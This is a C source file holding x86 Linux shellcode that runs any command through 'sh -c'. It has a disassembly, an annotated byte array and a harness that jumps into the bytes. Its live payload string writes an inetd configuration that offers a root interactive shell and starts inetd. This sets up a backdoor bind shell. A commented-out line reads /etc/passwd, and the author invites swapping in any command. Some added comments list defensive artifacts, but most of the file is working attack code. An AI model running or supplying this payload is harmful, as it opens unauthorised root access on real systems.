//
// 'execute anything' linux shellcode
// coded by Sergio 'shadown' Alvarez
// shadown@gmail.com || shadown@g-con.org
//

/*
00000000  EB25              jmp short 0x27
00000002  5A                pop edx
00000003  31C9              xor ecx,ecx
00000005  51                push ecx
00000006  686E2F7368        push dword 0x68732f6e
0000000B  682F2F6269        push dword 0x69622f2f
00000010  89E3              mov ebx,esp
00000012  51                push ecx
00000013  66682D63          push word 0x632d
00000017  89E0              mov eax,esp
00000019  51                push ecx
0000001A  52                push edx
0000001B  50                push eax
0000001C  53                push ebx
0000001D  89E1              mov ecx,esp
0000001F  31D2              xor edx,edx
00000021  31C0              xor eax,eax
00000023  040B              add al,0xb
00000025  CD80              int 0x80
00000027  E8D6FFFFFF        call 0x2
*/

/*
 * sc: a 44-byte x86 Linux stub (the disassembly above) followed directly by
 * the NUL-terminated command string it runs through "sh -c". The stub
 * builds "//bin/sh", "-c" and an argv[] on the stack, then issues syscall
 * 11 (execve) via int 0x80. The bytes are the original ones; only the
 * grouping (one instruction per line, annotated) differs.
 *
 * Defender notes: the array is a plain writable global, so on a build where
 * .data is mapped non-executable the jump into it from main() faults instead
 * of running. The payload's on-host artifacts are the file /tmp/myshell and
 * an inetd process started with a configuration file under /tmp.
 */
char sc[] =
	"\xeb\x25"              /* jmp short 0x27: to the call at the end     */
	"\x5a"                  /* pop edx: edx = address of the cmd string   */
	"\x31\xc9"              /* xor ecx,ecx                                */
	"\x51"                  /* push ecx: NUL terminator for "//bin/sh"    */
	"\x68\x6e\x2f\x73\x68"  /* push "n/sh"                                */
	"\x68\x2f\x2f\x62\x69"  /* push "//bi"                                */
	"\x89\xe3"              /* mov ebx,esp: ebx -> "//bin/sh"             */
	"\x51"                  /* push ecx: NUL terminator for "-c"          */
	"\x66\x68\x2d\x63"      /* push word "-c"                             */
	"\x89\xe0"              /* mov eax,esp: eax -> "-c"                   */
	"\x51"                  /* push ecx: argv[] NULL terminator           */
	"\x52"                  /* push edx: argv[2] = cmd string             */
	"\x50"                  /* push eax: argv[1] = "-c"                   */
	"\x53"                  /* push ebx: argv[0] = "//bin/sh"             */
	"\x89\xe1"              /* mov ecx,esp: ecx -> argv                   */
	"\x31\xd2"              /* xor edx,edx: envp = NULL                   */
	"\x31\xc0"              /* xor eax,eax                                */
	"\x04\x0b"              /* add al,0xb: syscall 11 = execve            */
	"\xcd\x80"              /* int 0x80                                   */
	"\xe8\xd6\xff\xff\xff"  /* call 0x2: pushes &cmd string, jumps back   */
	/* command string handed to "sh -c" (starts at sc[44]) */
	//"/bin/cat /etc/passwd > /tmp/salida; /bin/cat /tmp/salida"; // replace this by anything that you wish to execute ;)
	"/bin/echo \"domain stream tcp nowait root /bin/sh sh -i\" > /tmp/myshell; /usr/sbin/inetd /tmp/myshell &";

/*
 * Test harness: reinterprets the bytes of sc as a function and jumps into
 * them. argc/argv are unused; the command the stub runs is the string
 * appended to sc. Converting a char pointer to a function pointer is not
 * defined by the C standard, and where the data segment is mapped
 * non-executable the call raises SIGSEGV rather than running the stub.
 */
int main(int argc, char *argv[])
{
	(void)argc;
	(void)argv;
	void (*entry)(void) = (void (*)(void))sc;
	entry();
	return 0;
}
